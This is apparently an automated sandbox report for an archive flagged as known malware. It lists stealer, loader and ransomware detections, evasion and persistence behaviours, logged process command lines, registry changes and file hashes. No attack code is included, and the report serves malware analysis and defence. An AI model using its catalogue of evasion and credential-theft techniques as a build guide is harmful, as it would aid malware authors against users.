Analysis Overview
SHA256: f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932
Threat Level: Known bad
The file release_v4.rar was found to be: Known bad.
Malicious Activity Summary
RisePro
Stealc
Detected Djvu ransomware
Lumma Stealer
Detect ZGRat V1
SmokeLoader
Glupteba
ZGRat
Glupteba payload
Djvu Ransomware
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Modifies Windows Firewall
Themida packer
Modifies file permissions
Reads data files stored by FTP clients
Loads dropped DLL
Checks computer location settings
Identifies Wine through registry keys
Drops startup file
Reads user/profile data of web browsers
Checks BIOS information in registry
UPX packed file
Executes dropped EXE
Drops Chrome extension
Looks up external IP address via web service
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Opens file in notepad (likely ransom note)
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-02-23 11:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:58
Platform: win10v2004-20240221-en
Max time kernel: 121s
Max time network: 160s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3512 wrote to memory of 4888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3512 wrote to memory of 4888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3512 wrote to memory of 4888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4888 -ip 4888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 600
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:57
Platform: win7-20240220-en
Max time kernel: 123s
Max time network: 127s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.spp | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.spp\ = "spp_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2964 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2964 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2964 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 8737992e24d01a9b4b32a9fd5169f358 |
| SHA1 | a07b2359d6515d22799cdfef79fb18d42d582d73 |
| SHA256 | 281edc696cf491ac36890de8537ef78e9bb0b366747759de6650e3a154e81b03 |
| SHA512 | 0e36a70d02b1bb6161e65865caff467d6673826b28f92c472eacb61b7813910c5d26de75adfb5d49f925d35e9904ee307294be881d2f3bb871fd5a98754e9a56 |
Analysis: behavioral23
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:58
Platform: win7-20240221-en
Max time kernel: 121s
Max time network: 133s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2812 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2812 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2812 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 02fb92de41c824c3104f0d4c766faaf7 |
| SHA1 | 980d36729702c55463cf4dbf6bb6105990e84da9 |
| SHA256 | 41822af678abec3b61ea7e82b227757f12a5c7d584b86c43754014af87b38a4a |
| SHA512 | 2e1eb999d04a6d67a23fa088c2ce9a8f203b9dbe27984e73338a269dc7a77ceddbd7e7e0e3322da7c379278c0374148031e39d7dedeaaf42b40cd377007a1c22 |
Analysis: behavioral4
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:58
Platform: win10v2004-20240221-en
Max time kernel: 136s
Max time network: 157s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3220 wrote to memory of 4324 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3220 wrote to memory of 4324 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3220 wrote to memory of 4324 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:58
Platform: win7-20240221-en
Max time kernel: 117s
Max time network: 128s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1251.txt
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:57
Platform: win7-20240220-en
Max time kernel: 120s
Max time network: 124s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1258.txt
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted: 2024-02-23 11:52
Reported: 2024-02-23 11:58
Platform: win10v2004-20240221-en
Max time kernel: 100s
Max time network: 169s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Lumma Stealer
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
